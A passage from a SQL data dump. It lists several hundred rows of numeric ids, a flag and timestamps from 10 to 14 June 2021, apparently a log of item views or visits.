20:02:32'),(24031,3005,1,'2021-06-10','2021-06-10 20:05:07'),(24032,1596,1,'2021-06-10','2021-06-10 20:06:18'),(24033,1747,1,'2021-06-10','2021-06-10 20:21:34'),(24034,3030,1,'2021-06-10','2021-06-10 20:23:52'),(24035,2934,1,'2021-06-10','2021-06-10 20:24:22'),(24036,3004,1,'2021-06-10','2021-06-10 20:37:36'),(24037,2309,1,'2021-06-10','2021-06-10 20:38:38'),(24038,476,1,'2021-06-10','2021-06-10 20:38:55'),(24039,3005,1,'2021-06-10','2021-06-10 20:39:21'),(24040,1602,1,'2021-06-10','2021-06-10 20:40:56'),(24041,1612,1,'2021-06-10','2021-06-10 20:42:21'),(24042,2156,1,'2021-06-10','2021-06-10 20:43:02'),(24043,476,1,'2021-06-10','2021-06-10 20:49:30'),(24044,1610,1,'2021-06-10','2021-06-10 20:50:55'),(24045,3053,1,'2021-06-10','2021-06-10 20:51:10'),(24046,1612,1,'2021-06-10','2021-06-10 20:51:17'),(24047,2801,1,'2021-06-10','2021-06-10 21:04:32'),(24048,470,1,'2021-06-10','2021-06-10 21:07:12'),(24049,1600,1,'2021-06-10','2021-06-10 21:14:28'),(24050,76,1,'2021-06-10','2021-06-10 21:22:24'),(24051,1582,1,'2021-06-10','2021-06-10 21:39:21'),(24052,3023,1,'2021-06-10','2021-06-10 21:42:21'),(24053,68,1,'2021-06-10','2021-06-10 21:42:23'),(24054,68,1,'2021-06-10','2021-06-10 21:47:03'),(24055,481,1,'2021-06-10','2021-06-10 21:48:58'),(24056,3714,1,'2021-06-10','2021-06-10 21:52:43'),(24057,3287,1,'2021-06-10','2021-06-10 21:59:05'),(24058,1610,1,'2021-06-10','2021-06-10 22:01:14'),(24059,3263,1,'2021-06-10','2021-06-10 22:01:51'),(24060,3263,1,'2021-06-10','2021-06-10 22:04:10'),(24061,3045,1,'2021-06-10','2021-06-10 22:12:09'),(24062,1711,1,'2021-06-10','2021-06-10 22:29:16'),(24063,1614,1,'2021-06-10','2021-06-10 22:36:30'),(24064,3251,1,'2021-06-10','2021-06-10 22:37:59'),(24065,3253,1,'2021-06-10','2021-06-10 22:38:06'),(24066,1770,1,'2021-06-10','2021-06-10 22:43:25'),(24067,1770,1,'2021-06-10','2021-06-10 22:47:12'),(24068,3290,1,'2021-06-10','2021-06-10 22:48:41'),(24069,2658,1,'2021-06-10','2021-06-10 22:58:57'),(24070,2989,1,'2021-06-10','2021-06-10 23:01:21'),(24071,1608,1,'2021-06-10','2021-06-10 23:06:40'),(24072,469,1,'2021-06-10','2021-06-10 23:07:57'),(24073,1606,1,'2021-06-10','2021-06-10 23:09:07'),(24074,3710,1,'2021-06-10','2021-06-10 23:19:22'),(24075,1592,1,'2021-06-10','2021-06-10 23:31:35'),(24076,3107,1,'2021-06-10','2021-06-10 23:32:18'),(24077,477,1,'2021-06-10','2021-06-10 23:35:07'),(24078,484,1,'2021-06-10','2021-06-10 23:36:30'),(24079,1877,1,'2021-06-10','2021-06-10 23:39:36'),(24080,1766,1,'2021-06-10','2021-06-10 23:40:18'),(24081,1749,1,'2021-06-10','2021-06-10 23:43:57'),(24082,1747,1,'2021-06-10','2021-06-10 23:52:35'),(24083,472,1,'2021-06-11','2021-06-11 00:01:15'),(24084,2809,1,'2021-06-11','2021-06-11 00:08:47'),(24085,3285,1,'2021-06-11','2021-06-11 00:08:49'),(24086,3226,1,'2021-06-11','2021-06-11 00:11:31'),(24087,3498,1,'2021-06-11','2021-06-11 00:20:47'),(24088,3058,1,'2021-06-11','2021-06-11 00:22:21'),(24089,3226,1,'2021-06-11','2021-06-11 00:22:43'),(24090,2609,1,'2021-06-11','2021-06-11 00:23:06'),(24091,2609,1,'2021-06-11','2021-06-11 00:23:07'),(24092,2609,1,'2021-06-11','2021-06-11 00:31:30'),(24093,3534,1,'2021-06-11','2021-06-11 00:39:08'),(24094,3060,1,'2021-06-11','2021-06-11 00:39:21'),(24095,1872,1,'2021-06-11','2021-06-11 00:40:45'),(24096,1747,1,'2021-06-11','2021-06-11 00:48:46'),(24097,80,1,'2021-06-11','2021-06-11 00:48:58'),(24098,3030,1,'2021-06-11','2021-06-11 00:53:49'),(24099,2809,1,'2021-06-11','2021-06-11 00:59:09'),(24100,3107,1,'2021-06-11','2021-06-11 01:06:11'),(24101,2457,1,'2021-06-11','2021-06-11 01:08:45'),(24102,2704,1,'2021-06-11','2021-06-11 01:09:06'),(24103,3107,1,'2021-06-11','2021-06-11 01:09:24'),(24104,570,1,'2021-06-11','2021-06-11 01:18:54'),(24105,3253,1,'2021-06-11','2021-06-11 01:19:17'),(24106,1594,1,'2021-06-11','2021-06-11 01:21:06'),(24107,3104,1,'2021-06-11','2021-06-11 01:39:01'),(24108,3479,1,'2021-06-11','2021-06-11 01:39:18'),(24109,3069,1,'2021-06-11','2021-06-11 01:41:03'),(24110,1772,1,'2021-06-11','2021-06-11 01:49:30'),(24111,1741,1,'2021-06-11','2021-06-11 01:52:28'),(24112,477,1,'2021-06-11','2021-06-11 01:54:59'),(24113,3229,1,'2021-06-11','2021-06-11 01:59:22'),(24114,2989,1,'2021-06-11','2021-06-11 01:59:57'),(24115,1598,1,'2021-06-11','2021-06-11 02:09:33'),(24116,1718,1,'2021-06-11','2021-06-11 02:09:56'),(24117,2609,1,'2021-06-11','2021-06-11 02:18:35'),(24118,1614,1,'2021-06-11','2021-06-11 02:19:57'),(24119,3261,1,'2021-06-11','2021-06-11 02:36:17'),(24120,91,1,'2021-06-11','2021-06-11 02:39:19'),(24121,89,1,'2021-06-11','2021-06-11 02:48:39'),(24122,1604,1,'2021-06-11','2021-06-11 02:49:09'),(24123,80,1,'2021-06-11','2021-06-11 02:58:05'),(24124,84,1,'2021-06-11','2021-06-11 03:02:29'),(24125,3698,1,'2021-06-11','2021-06-11 03:07:10'),(24126,3541,1,'2021-06-11','2021-06-11 03:09:59'),(24127,3541,1,'2021-06-11','2021-06-11 03:11:14'),(24128,3083,1,'2021-06-11','2021-06-11 03:20:15'),(24129,2178,1,'2021-06-11','2021-06-11 03:28:40'),(24130,1602,1,'2021-06-11','2021-06-11 03:31:31'),(24131,1596,1,'2021-06-11','2021-06-11 03:34:40'),(24132,3127,1,'2021-06-11','2021-06-11 03:39:24'),(24133,2609,1,'2021-06-11','2021-06-11 03:39:39'),(24134,1766,1,'2021-06-11','2021-06-11 03:50:03'),(24135,2558,1,'2021-06-11','2021-06-11 04:01:36'),(24136,3069,1,'2021-06-11','2021-06-11 04:14:09'),(24137,1588,1,'2021-06-11','2021-06-11 04:19:45'),(24138,3271,1,'2021-06-11','2021-06-11 04:20:18'),(24139,3486,1,'2021-06-11','2021-06-11 04:29:32'),(24140,1602,1,'2021-06-11','2021-06-11 04:41:02'),(24141,3694,1,'2021-06-11','2021-06-11 04:42:13'),(24142,76,1,'2021-06-11','2021-06-11 04:43:25'),(24143,1586,1,'2021-06-11','2021-06-11 04:49:10'),(24144,2617,1,'2021-06-11','2021-06-11 04:53:02'),(24145,80,1,'2021-06-11','2021-06-11 04:57:04'),(24146,1870,1,'2021-06-11','2021-06-11 04:59:50'),(24147,2490,1,'2021-06-11','2021-06-11 05:04:33'),(24148,3531,1,'2021-06-11','2021-06-11 05:10:31'),(24149,2309,1,'2021-06-11','2021-06-11 05:10:51'),(24150,3313,1,'2021-06-11','2021-06-11 05:15:39'),(24151,1870,1,'2021-06-11','2021-06-11 05:20:30'),(24152,3249,1,'2021-06-11','2021-06-11 05:22:23'),(24153,2934,1,'2021-06-11','2021-06-11 05:31:06'),(24154,3027,1,'2021-06-11','2021-06-11 05:33:57'),(24155,2775,1,'2021-06-11','2021-06-11 05:40:08'),(24156,3109,1,'2021-06-11','2021-06-11 05:42:14'),(24157,2751,1,'2021-06-11','2021-06-11 05:42:21'),(24158,2911,1,'2021-06-11','2021-06-11 05:44:48'),(24159,3109,1,'2021-06-11','2021-06-11 05:50:40'),(24160,80,1,'2021-06-11','2021-06-11 05:53:14'),(24161,1596,1,'2021-06-11','2021-06-11 05:53:50'),(24162,1582,1,'2021-06-11','2021-06-11 06:07:41'),(24163,1582,1,'2021-06-11','2021-06-11 06:07:42'),(24164,2993,1,'2021-06-11','2021-06-11 06:11:16'),(24165,1582,1,'2021-06-11','2021-06-11 06:15:24'),(24166,1606,1,'2021-06-11','2021-06-11 06:19:12'),(24167,2911,1,'2021-06-11','2021-06-11 06:21:15'),(24168,2813,1,'2021-06-11','2021-06-11 06:21:43'),(24169,2410,1,'2021-06-11','2021-06-11 06:27:00'),(24170,3430,1,'2021-06-11','2021-06-11 06:30:03'),(24171,1749,1,'2021-06-11','2021-06-11 06:31:00'),(24172,3090,1,'2021-06-11','2021-06-11 06:32:31'),(24173,1582,1,'2021-06-11','2021-06-11 06:33:12'),(24174,471,1,'2021-06-11','2021-06-11 06:33:40'),(24175,1737,1,'2021-06-11','2021-06-11 06:35:02'),(24176,1544,1,'2021-06-11','2021-06-11 06:39:59'),(24177,3030,1,'2021-06-11','2021-06-11 06:40:08'),(24178,3030,1,'2021-06-11','2021-06-11 06:40:10'),(24179,1606,1,'2021-06-11','2021-06-11 06:40:37'),(24180,1614,1,'2021-06-11','2021-06-11 06:41:11'),(24181,2395,1,'2021-06-11','2021-06-11 06:44:46'),(24182,2419,1,'2021-06-11','2021-06-11 06:45:28'),(24183,3271,1,'2021-06-11','2021-06-11 06:45:44'),(24184,3124,1,'2021-06-11','2021-06-11 06:52:24'),(24185,3027,1,'2021-06-11','2021-06-11 06:56:53'),(24186,1588,1,'2021-06-11','2021-06-11 06:59:59'),(24187,2508,1,'2021-06-11','2021-06-11 07:00:10'),(24188,2395,1,'2021-06-11','2021-06-11 07:03:27'),(24189,3245,1,'2021-06-11','2021-06-11 07:10:22'),(24190,3307,1,'2021-06-11','2021-06-11 07:11:12'),(24191,1705,1,'2021-06-11','2021-06-11 07:12:28'),(24192,469,1,'2021-06-11','2021-06-11 07:30:50'),(24193,3714,1,'2021-06-11','2021-06-11 07:32:26'),(24194,3267,1,'2021-06-11','2021-06-11 07:36:50'),(24195,3251,1,'2021-06-11','2021-06-11 07:39:08'),(24196,2159,1,'2021-06-11','2021-06-11 07:42:04'),(24197,3290,1,'2021-06-11','2021-06-11 07:43:30'),(24198,1544,1,'2021-06-11','2021-06-11 08:03:42'),(24199,3287,1,'2021-06-11','2021-06-11 08:05:23'),(24200,1780,1,'2021-06-11','2021-06-11 08:05:31'),(24201,3243,1,'2021-06-11','2021-06-11 08:17:27'),(24202,1586,1,'2021-06-11','2021-06-11 08:21:41'),(24203,3282,1,'2021-06-11','2021-06-11 08:22:54'),(24204,3267,1,'2021-06-11','2021-06-11 08:23:03'),(24205,1701,1,'2021-06-11','2021-06-11 08:25:45'),(24206,1594,1,'2021-06-11','2021-06-11 08:30:39'),(24207,2813,1,'2021-06-11','2021-06-11 08:31:25'),(24208,1544,1,'2021-06-11','2021-06-11 08:34:43'),(24209,3243,1,'2021-06-11','2021-06-11 08:44:31'),(24210,3034,1,'2021-06-11','2021-06-11 08:45:24'),(24211,1877,1,'2021-06-11','2021-06-11 08:46:43'),(24212,3034,1,'2021-06-11','2021-06-11 08:50:56'),(24213,3005,1,'2021-06-11','2021-06-11 08:59:35'),(24214,1606,1,'2021-06-11','2021-06-11 09:00:02'),(24215,3097,1,'2021-06-11','2021-06-11 09:02:02'),(24216,3099,1,'2021-06-11','2021-06-11 09:02:59'),(24217,3005,1,'2021-06-11','2021-06-11 09:08:47'),(24218,1770,1,'2021-06-11','2021-06-11 09:11:16'),(24219,2457,1,'2021-06-11','2021-06-11 09:17:50'),(24220,3290,1,'2021-06-11','2021-06-11 09:21:09'),(24221,1766,1,'2021-06-11','2021-06-11 09:22:26'),(24222,1592,1,'2021-06-11','2021-06-11 09:26:48'),(24223,1766,1,'2021-06-11','2021-06-11 09:28:02'),(24224,1747,1,'2021-06-11','2021-06-11 09:41:45'),(24225,3247,1,'2021-06-11','2021-06-11 09:51:56'),(24226,2704,1,'2021-06-11','2021-06-11 09:52:32'),(24227,2775,1,'2021-06-11','2021-06-11 10:01:07'),(24228,3175,1,'2021-06-11','2021-06-11 10:02:01'),(24229,3097,1,'2021-06-11','2021-06-11 10:11:08'),(24230,3058,1,'2021-06-11','2021-06-11 10:11:46'),(24231,2178,1,'2021-06-11','2021-06-11 10:12:04'),(24232,68,1,'2021-06-11','2021-06-11 10:13:00'),(24233,2420,1,'2021-06-11','2021-06-11 10:15:16'),(24234,477,1,'2021-06-11','2021-06-11 10:15:31'),(24235,2156,1,'2021-06-11','2021-06-11 10:22:45'),(24236,68,1,'2021-06-11','2021-06-11 10:23:42'),(24237,76,1,'2021-06-11','2021-06-11 10:24:44'),(24238,1598,1,'2021-06-11','2021-06-11 10:25:42'),(24239,3045,1,'2021-06-11','2021-06-11 10:30:51'),(24240,570,1,'2021-06-11','2021-06-11 10:51:49'),(24241,1594,1,'2021-06-11','2021-06-11 10:53:12'),(24242,1602,1,'2021-06-11','2021-06-11 10:59:47'),(24243,1730,1,'2021-06-11','2021-06-11 11:01:22'),(24244,1586,1,'2021-06-11','2021-06-11 11:07:26'),(24245,3030,1,'2021-06-11','2021-06-11 11:08:04'),(24246,3083,1,'2021-06-11','2021-06-11 11:14:36'),(24247,76,1,'2021-06-11','2021-06-11 11:16:12'),(24248,2617,1,'2021-06-11','2021-06-11 11:27:15'),(24249,1598,1,'2021-06-11','2021-06-11 11:30:38'),(24250,1602,1,'2021-06-11','2021-06-11 11:32:17'),(24251,3486,1,'2021-06-11','2021-06-11 11:39:54'),(24252,1598,1,'2021-06-11','2021-06-11 11:41:43'),(24253,91,1,'2021-06-11','2021-06-11 11:43:05'),(24254,1606,1,'2021-06-11','2021-06-11 11:43:19'),(24255,89,1,'2021-06-11','2021-06-11 11:43:53'),(24256,1604,1,'2021-06-11','2021-06-11 11:50:21'),(24257,3097,1,'2021-06-11','2021-06-11 11:57:33'),(24258,2411,1,'2021-06-11','2021-06-11 12:04:35'),(24259,3063,1,'2021-06-11','2021-06-11 12:05:11'),(24260,3109,1,'2021-06-11','2021-06-11 12:12:02'),(24261,3541,1,'2021-06-11','2021-06-11 12:22:00'),(24262,2804,1,'2021-06-11','2021-06-11 12:32:09'),(24263,3053,1,'2021-06-11','2021-06-11 12:32:11'),(24264,3710,1,'2021-06-11','2021-06-11 12:40:07'),(24265,1592,1,'2021-06-11','2021-06-11 12:42:21'),(24266,1612,1,'2021-06-11','2021-06-11 12:43:00'),(24267,108,1,'2021-06-11','2021-06-11 12:43:02'),(24268,108,1,'2021-06-11','2021-06-11 12:44:19'),(24269,2609,1,'2021-06-11','2021-06-11 12:54:15'),(24270,2159,1,'2021-06-11','2021-06-11 12:56:45'),(24271,3034,1,'2021-06-11','2021-06-11 13:12:33'),(24272,3691,1,'2021-06-11','2021-06-11 13:14:19'),(24273,1774,1,'2021-06-11','2021-06-11 13:18:26'),(24274,3705,1,'2021-06-11','2021-06-11 13:22:46'),(24275,3226,1,'2021-06-11','2021-06-11 13:32:59'),(24276,1594,1,'2021-06-11','2021-06-11 13:33:48'),(24277,3534,1,'2021-06-11','2021-06-11 13:40:32'),(24278,3486,1,'2021-06-11','2021-06-11 13:43:41'),(24279,2617,1,'2021-06-11','2021-06-11 13:45:12'),(24280,2490,1,'2021-06-11','2021-06-11 13:54:48'),(24281,3181,1,'2021-06-11','2021-06-11 13:56:38'),(24282,1604,1,'2021-06-11','2021-06-11 13:58:55'),(24283,1544,1,'2021-06-11','2021-06-11 14:01:29'),(24284,1582,1,'2021-06-11','2021-06-11 14:02:20'),(24285,2558,1,'2021-06-11','2021-06-11 14:03:22'),(24286,3285,1,'2021-06-11','2021-06-11 14:07:28'),(24287,2410,1,'2021-06-11','2021-06-11 14:13:20'),(24288,3531,1,'2021-06-11','2021-06-11 14:13:38'),(24289,89,1,'2021-06-11','2021-06-11 14:14:38'),(24290,335,1,'2021-06-11','2021-06-11 14:25:35'),(24291,3127,1,'2021-06-11','2021-06-11 14:34:59'),(24292,3489,1,'2021-06-11','2021-06-11 14:37:08'),(24293,1584,1,'2021-06-11','2021-06-11 14:42:02'),(24294,3226,1,'2021-06-11','2021-06-11 14:43:50'),(24295,3313,1,'2021-06-11','2021-06-11 14:47:31'),(24296,3430,1,'2021-06-11','2021-06-11 14:57:57'),(24297,2813,1,'2021-06-11','2021-06-11 15:04:18'),(24298,2769,1,'2021-06-11','2021-06-11 15:04:27'),(24299,1870,1,'2021-06-11','2021-06-11 15:04:57'),(24300,1594,1,'2021-06-11','2021-06-11 15:11:18'),(24301,76,1,'2021-06-11','2021-06-11 15:14:04'),(24302,3104,1,'2021-06-11','2021-06-11 15:14:41'),(24303,2751,1,'2021-06-11','2021-06-11 15:15:41'),(24304,3534,1,'2021-06-11','2021-06-11 15:24:59'),(24305,3534,1,'2021-06-11','2021-06-11 15:29:29'),(24306,1582,1,'2021-06-11','2021-06-11 15:31:02'),(24307,1594,1,'2021-06-11','2021-06-11 15:34:51'),(24308,1598,1,'2021-06-11','2021-06-11 15:44:00'),(24309,483,1,'2021-06-11','2021-06-11 15:46:19'),(24310,80,1,'2021-06-11','2021-06-11 15:49:05'),(24311,2503,1,'2021-06-11','2021-06-11 15:49:13'),(24312,3273,1,'2021-06-11','2021-06-11 15:50:17'),(24313,1594,1,'2021-06-11','2021-06-11 15:51:24'),(24314,3714,1,'2021-06-11','2021-06-11 15:53:35'),(24315,1602,1,'2021-06-11','2021-06-11 15:56:24'),(24316,1718,1,'2021-06-11','2021-06-11 16:02:28'),(24317,1588,1,'2021-06-11','2021-06-11 16:03:53'),(24318,1596,1,'2021-06-11','2021-06-11 16:04:22'),(24319,3307,1,'2021-06-11','2021-06-11 16:16:32'),(24320,1594,1,'2021-06-11','2021-06-11 16:16:45'),(24321,106,1,'2021-06-11','2021-06-11 16:30:58'),(24322,3102,1,'2021-06-11','2021-06-11 16:33:27'),(24323,1594,1,'2021-06-11','2021-06-11 16:40:16'),(24324,1594,1,'2021-06-11','2021-06-11 16:44:11'),(24325,1594,1,'2021-06-11','2021-06-11 16:46:35'),(24326,1594,1,'2021-06-11','2021-06-11 16:47:32'),(24327,1592,1,'2021-06-11','2021-06-11 16:52:16'),(24328,1602,1,'2021-06-11','2021-06-11 16:55:58'),(24329,1602,1,'2021-06-11','2021-06-11 17:56:00'),(24330,1606,1,'2021-06-11','2021-06-11 17:58:47'),(24331,1588,1,'2021-06-11','2021-06-11 18:00:07'),(24332,1604,1,'2021-06-11','2021-06-11 18:01:01'),(24333,1604,1,'2021-06-11','2021-06-11 18:01:32'),(24334,1604,1,'2021-06-11','2021-06-11 18:03:05'),(24335,2911,1,'2021-06-11','2021-06-11 18:03:15'),(24336,2297,1,'2021-06-11','2021-06-11 18:06:06'),(24337,3247,1,'2021-06-11','2021-06-11 18:17:07'),(24338,2309,1,'2021-06-11','2021-06-11 19:25:52'),(24339,2309,1,'2021-06-11','2021-06-11 19:26:08'),(24340,1774,1,'2021-06-11','2021-06-11 19:51:48'),(24341,2159,1,'2021-06-11','2021-06-11 20:11:12'),(24342,1602,1,'2021-06-11','2021-06-11 20:58:15'),(24343,80,1,'2021-06-11','2021-06-11 21:11:27'),(24344,80,1,'2021-06-11','2021-06-11 21:14:04'),(24345,2309,1,'2021-06-11','2021-06-11 21:16:46'),(24346,68,1,'2021-06-11','2021-06-11 21:29:03'),(24347,2309,1,'2021-06-11','2021-06-11 21:56:32'),(24348,3030,1,'2021-06-11','2021-06-11 23:12:17'),(24349,1602,1,'2021-06-11','2021-06-11 23:23:25'),(24350,74,1,'2021-06-11','2021-06-11 23:27:12'),(24351,1602,1,'2021-06-11','2021-06-11 23:57:25'),(24352,76,1,'2021-06-12','2021-06-12 00:15:08'),(24353,68,1,'2021-06-12','2021-06-12 03:21:48'),(24354,1715,1,'2021-06-12','2021-06-12 04:00:26'),(24355,2154,1,'2021-06-12','2021-06-12 04:46:43'),(24356,2154,1,'2021-06-12','2021-06-12 04:50:16'),(24357,1602,1,'2021-06-12','2021-06-12 05:12:21'),(24358,2159,1,'2021-06-12','2021-06-12 07:07:43'),(24359,1602,1,'2021-06-12','2021-06-12 07:34:11'),(24360,467,1,'2021-06-12','2021-06-12 08:28:35'),(24361,2309,1,'2021-06-12','2021-06-12 08:30:07'),(24362,2159,1,'2021-06-12','2021-06-12 09:33:37'),(24363,2309,1,'2021-06-12','2021-06-12 09:53:30'),(24364,2309,1,'2021-06-12','2021-06-12 09:54:40'),(24365,2150,1,'2021-06-12','2021-06-12 10:42:36'),(24366,1586,1,'2021-06-12','2021-06-12 11:31:00'),(24367,2159,1,'2021-06-12','2021-06-12 12:01:59'),(24368,2159,1,'2021-06-12','2021-06-12 12:02:33'),(24369,3060,1,'2021-06-12','2021-06-12 12:19:56'),(24370,3060,1,'2021-06-12','2021-06-12 12:20:01'),(24371,3060,1,'2021-06-12','2021-06-12 12:20:01'),(24372,1608,1,'2021-06-12','2021-06-12 12:38:06'),(24373,2309,1,'2021-06-12','2021-06-12 12:50:27'),(24374,1600,1,'2021-06-12','2021-06-12 12:52:37'),(24375,2159,1,'2021-06-12','2021-06-12 13:11:13'),(24376,2159,1,'2021-06-12','2021-06-12 13:11:56'),(24377,2159,1,'2021-06-12','2021-06-12 13:15:46'),(24378,68,1,'2021-06-12','2021-06-12 13:27:47'),(24379,68,1,'2021-06-12','2021-06-12 13:59:07'),(24380,2159,1,'2021-06-12','2021-06-12 14:19:25'),(24381,2297,1,'2021-06-12','2021-06-12 14:42:36'),(24382,2159,1,'2021-06-12','2021-06-12 14:50:08'),(24383,1602,1,'2021-06-12','2021-06-12 15:59:25'),(24384,1584,1,'2021-06-12','2021-06-12 16:14:12'),(24385,1602,1,'2021-06-12','2021-06-12 16:17:28'),(24386,3038,1,'2021-06-12','2021-06-12 17:59:53'),(24387,1602,1,'2021-06-12','2021-06-12 18:17:35'),(24388,2154,1,'2021-06-12','2021-06-12 20:19:37'),(24389,3030,1,'2021-06-12','2021-06-12 20:26:55'),(24390,3030,1,'2021-06-12','2021-06-12 20:27:09'),(24391,2159,1,'2021-06-12','2021-06-12 20:33:35'),(24392,3541,1,'2021-06-12','2021-06-12 20:34:25'),(24393,1732,1,'2021-06-12','2021-06-12 20:34:43'),(24394,2154,1,'2021-06-12','2021-06-12 21:06:05'),(24395,470,1,'2021-06-13','2021-06-13 02:52:58'),(24396,471,1,'2021-06-13','2021-06-13 03:09:36'),(24397,2297,1,'2021-06-13','2021-06-13 05:34:26'),(24398,2309,1,'2021-06-13','2021-06-13 06:29:56'),(24399,2297,1,'2021-06-13','2021-06-13 08:43:40'),(24400,1608,1,'2021-06-13','2021-06-13 09:53:09'),(24401,2558,1,'2021-06-13','2021-06-13 09:54:26'),(24402,84,1,'2021-06-13','2021-06-13 09:55:05'),(24403,1872,1,'2021-06-13','2021-06-13 09:55:27'),(24404,68,1,'2021-06-13','2021-06-13 09:55:38'),(24405,335,1,'2021-06-13','2021-06-13 09:56:19'),(24406,1606,1,'2021-06-13','2021-06-13 10:04:33'),(24407,80,1,'2021-06-13','2021-06-13 10:06:14'),(24408,2159,1,'2021-06-13','2021-06-13 10:48:46'),(24409,2159,1,'2021-06-13','2021-06-13 10:48:50'),(24410,1780,1,'2021-06-13','2021-06-13 10:52:23'),(24411,3710,1,'2021-06-13','2021-06-13 10:58:18'),(24412,1586,1,'2021-06-13','2021-06-13 12:27:05'),(24413,1586,1,'2021-06-13','2021-06-13 12:27:16'),(24414,1586,1,'2021-06-13','2021-06-13 12:27:39'),(24415,3066,1,'2021-06-13','2021-06-13 13:07:27'),(24416,2457,1,'2021-06-13','2021-06-13 13:30:56'),(24417,3092,1,'2021-06-13','2021-06-13 13:37:14'),(24418,2159,1,'2021-06-13','2021-06-13 14:05:46'),(24419,1586,1,'2021-06-13','2021-06-13 14:50:57'),(24420,2617,1,'2021-06-13','2021-06-13 14:51:44'),(24421,1586,1,'2021-06-13','2021-06-13 15:36:08'),(24422,1586,1,'2021-06-13','2021-06-13 15:51:55'),(24423,1608,1,'2021-06-13','2021-06-13 16:00:25'),(24424,80,1,'2021-06-13','2021-06-13 16:00:35'),(24425,1608,1,'2021-06-13','2021-06-13 16:05:10'),(24426,2159,1,'2021-06-13','2021-06-13 17:07:17'),(24427,1594,1,'2021-06-13','2021-06-13 17:10:21'),(24428,3498,1,'2021-06-13','2021-06-13 17:57:34'),(24429,2704,1,'2021-06-13','2021-06-13 18:18:28'),(24430,2704,1,'2021-06-13','2021-06-13 18:22:34'),(24431,2704,1,'2021-06-13','2021-06-13 18:33:20'),(24432,2704,1,'2021-06-13','2021-06-13 19:43:03'),(24433,1594,1,'2021-06-13','2021-06-13 20:11:45'),(24434,1594,1,'2021-06-13','2021-06-13 20:12:17'),(24435,1594,1,'2021-06-13','2021-06-13 20:17:04'),(24436,1594,1,'2021-06-13','2021-06-13 20:18:10'),(24437,76,1,'2021-06-13','2021-06-13 20:18:28'),(24438,91,1,'2021-06-13','2021-06-13 20:22:26'),(24439,3261,1,'2021-06-13','2021-06-13 20:22:45'),(24440,91,1,'2021-06-13','2021-06-13 20:22:57'),(24441,76,1,'2021-06-13','2021-06-13 20:23:09'),(24442,1594,1,'2021-06-13','2021-06-13 20:23:15'),(24443,2159,1,'2021-06-13','2021-06-13 20:53:40'),(24444,2159,1,'2021-06-13','2021-06-13 21:08:31'),(24445,1734,1,'2021-06-13','2021-06-13 21:47:22'),(24446,2159,1,'2021-06-13','2021-06-13 22:12:59'),(24447,2309,1,'2021-06-13','2021-06-13 22:14:49'),(24448,1602,1,'2021-06-13','2021-06-13 22:37:29'),(24449,1730,1,'2021-06-13','2021-06-13 22:38:58'),(24450,2297,1,'2021-06-13','2021-06-13 22:40:29'),(24451,2159,1,'2021-06-13','2021-06-13 22:50:10'),(24452,2159,1,'2021-06-13','2021-06-13 22:50:44'),(24453,2309,1,'2021-06-13','2021-06-13 22:53:46'),(24454,2159,1,'2021-06-13','2021-06-13 23:05:16'),(24455,2159,1,'2021-06-13','2021-06-13 23:27:54'),(24456,2159,1,'2021-06-13','2021-06-13 23:30:33'),(24457,2159,1,'2021-06-13','2021-06-13 23:59:12'),(24458,2309,1,'2021-06-14','2021-06-14 00:01:05'),(24459,2991,1,'2021-06-14','2021-06-14 00:40:32'),(24460,3280,1,'2021-06-14','2021-06-14 00:41:28'),(24461,2309,1,'2021-06-14','2021-06-14 00:56:46'),(24462,2309,1,'2021-06-14','2021-06-14 01:04:04'),(24463,1600,1,'2021-06-14','2021-06-14 03:26:04'),(24464,76,1,'2021-06-14','2021-06-14 03:35:42'),(24465,1600,1,'2021-06-14','2021-06-14 03:38:51'),(24466,3261,1,'2021-06-14','2021-06-14 03:42:59'),(24467,1600,1,'2021-06-14','2021-06-14 04:15:34'),(24468,1600,1,'2021-06-14','2021-06-14 04:15:48'),(24469,3109,1,'2021-06-14','2021-06-14 04:18:03'),(24470,2159,1,'2021-06-14','2021-06-14 04:45:46'),(24471,1612,1,'2021-06-14','2021-06-14 04:47:42'),(24472,1594,1,'2021-06-14','2021-06-14 05:27:06'),(24473,1594,1,'2021-06-14','2021-06-14 05:27:11'),(24474,1614,1,'2021-06-14','2021-06-14 05:31:39'),(24475,1600,1,'2021-06-14','2021-06-14 06:17:45'),(24476,3313,1,'2021-06-14','2021-06-14 07:57:48'),(24477,3261,1,'2021-06-14','2021-06-14 08:15:17'),(24478,2148,1,'2021-06-14','2021-06-14 08:17:42'),(24479,2159,1,'2021-06-14','2021-06-14 08:20:26'),(24480,3261,1,'2021-06-14','2021-06-14 08:47:34'),(24481,1602,1,'2021-06-14','2021-06-14 09:07:30'),(24482,1747,1,'2021-06-14','2021-06-14 09:21:36'),(24483,1604,1,'2021-06-14','2021-06-14 09:28:58'),(24484,87,1,'2021-06-14','2021-06-14 09:29:15'),(24485,1718,1,'2021-06-14','2021-06-14 09:56:51'),(24486,1594,1,'2021-06-14','2021-06-14 10:03:12'),(24487,2309,1,'2021-06-14','2021-06-14 10:03:39'),(24488,1602,1,'2021-06-14','2021-06-14 10:18:47'),(24489,3083,1,'2021-06-14','2021-06-14 10:53:52'),(24490,1586,1,'2021-06-14','2021-06-14 11:17:26'),(24491,3030,1,'2021-06-14','2021-06-14 11:26:07'),(24492,1608,1,'2021-06-14','2021-06-14 11:28:28'),(24493,1602,1,'2021-06-14','2021-06-14 11:34:27'),(24494,68,1,'2021-06-14','2021-06-14 11:34:43'),(24495,1602,1,'2021-06-14','2021-06-14 11:34:53'),(24496,1586,1,'2021-06-14','2021-06-14 12:03:59'),(24497,76,1,'2021-06-14','2021-06-14 12:13:56'),(24498,1586,1,'2021-06-14','2021-06-14 12:19:28'),(24499,1588,1,'2021-06-14','2021-06-14 12:50:29'),(24500,89,1,'2021-06-14','2021-06-14 12:50:41'),(24501,1582,1,'2021-06-14','2021-06-14 12:51:23'),(24502,1586,1,'2021-06-14','2021-06-14 13:20:01'),(24503,3087,1,'2021-06-14','2021-06-14 14:36:27'),(24504,87,1,'2021-06-14','2021-06-14 14:39:01'),(24505,1747,1,'2021-06-14','2021-06-14 14:55:55'),(24506,1600,1,'2021-06-14','2021-06-14 14:58:32'),(24507,91,1,'2021-06-14','2021-06-14 15:15:44'),(24508,91,1,'2021-06-14','2021-06-14 15:15:45'),(24509,469,1,'2021-06-14','2021-06-14 15:17:34'),(24510,2297,1,'2021-06-14','2021-06-14 15:27:53'),(24511,1588,1,'2021-06-14','2021-06-14 15:32:47'),(24512,1608,1,'2021-06-14','2021-06-14 15:39:49'),(24513,1608,1,'2021-06-14','2021-06-14 15:39:50'),(24514,1608,1,'2021-06-14','2021-06-14 15:40:38'),(24515,1701,1,'2021-06-14','2021-06-14 15:41:47'),(24516,1701,1,'2021-06-14','2021-06-14 